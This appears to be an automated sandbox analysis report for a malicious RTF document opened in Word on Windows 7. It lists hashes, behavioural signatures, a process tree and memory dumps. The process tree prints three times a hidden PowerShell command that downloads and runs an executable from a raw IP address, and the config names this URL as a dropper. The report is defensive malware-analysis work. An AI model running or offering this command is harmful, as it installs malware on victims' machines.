Analysis

  • max time kernel
    148s
  • max time network
    197s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    30-07-2021 15:26

General

  • Target

    57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf

  • Size

    662KB

  • MD5

    47a5e618c809f1f37bccced9d3536deb

  • SHA1

    da3a6f5851537edffcc29e9bf4282d552090ce6e

  • SHA256

    57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752

  • SHA512

    0d4f429f517b2d2045ef32e3a8e3f86b9a250e7f666398d88409a9a56e2a155baef2decf3c167941cd7da28b503241a6f9553d3ca06094bb965781097cb7a18c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://136.144.41.61/fresh.exe

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:832
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1784
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1012
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:936

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/832-100-0x0000000006440000-0x0000000006441000-memory.dmp

      Filesize

      4KB

    • memory/832-68-0x0000000004840000-0x0000000004841000-memory.dmp

      Filesize

      4KB

    • memory/832-91-0x00000000062C0000-0x00000000062C1000-memory.dmp

      Filesize

      4KB

    • memory/832-87-0x000000007EF30000-0x000000007EF31000-memory.dmp

      Filesize

      4KB

    • memory/832-65-0x0000000001F40000-0x0000000001F41000-memory.dmp

      Filesize

      4KB

    • memory/832-115-0x00000000065C0000-0x00000000065C1000-memory.dmp

      Filesize

      4KB

    • memory/832-66-0x0000000004880000-0x0000000004881000-memory.dmp

      Filesize

      4KB

    • memory/832-114-0x00000000065B0000-0x00000000065B1000-memory.dmp

      Filesize

      4KB

    • memory/832-86-0x0000000006280000-0x0000000006281000-memory.dmp

      Filesize

      4KB

    • memory/832-79-0x00000000061E0000-0x00000000061E1000-memory.dmp

      Filesize

      4KB

    • memory/832-78-0x0000000005700000-0x0000000005701000-memory.dmp

      Filesize

      4KB

    • memory/832-73-0x0000000005660000-0x0000000005661000-memory.dmp

      Filesize

      4KB

    • memory/832-70-0x0000000005240000-0x0000000005241000-memory.dmp

      Filesize

      4KB

    • memory/832-69-0x0000000004842000-0x0000000004843000-memory.dmp

      Filesize

      4KB

    • memory/832-67-0x0000000002540000-0x0000000002541000-memory.dmp

      Filesize

      4KB

    • memory/936-139-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

      Filesize

      8KB

    • memory/1012-98-0x0000000001F80000-0x0000000002BCA000-memory.dmp

      Filesize

      12.3MB

    • memory/1012-126-0x00000000064C0000-0x00000000064C1000-memory.dmp

      Filesize

      4KB

    • memory/1012-97-0x0000000001F80000-0x0000000002BCA000-memory.dmp

      Filesize

      12.3MB

    • memory/1028-60-0x000000006FF11000-0x000000006FF13000-memory.dmp

      Filesize

      8KB

    • memory/1028-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1028-62-0x0000000075591000-0x0000000075593000-memory.dmp

      Filesize

      8KB

    • memory/1028-59-0x0000000072491000-0x0000000072494000-memory.dmp

      Filesize

      12KB

    • memory/1784-132-0x00000000023F0000-0x00000000023F1000-memory.dmp

      Filesize

      4KB

    • memory/1784-133-0x0000000004920000-0x0000000004921000-memory.dmp

      Filesize

      4KB

    • memory/1784-134-0x0000000002720000-0x0000000002721000-memory.dmp

      Filesize

      4KB

    • memory/1784-135-0x0000000005300000-0x0000000005301000-memory.dmp

      Filesize

      4KB

    • memory/1784-136-0x0000000006070000-0x0000000006071000-memory.dmp

      Filesize

      4KB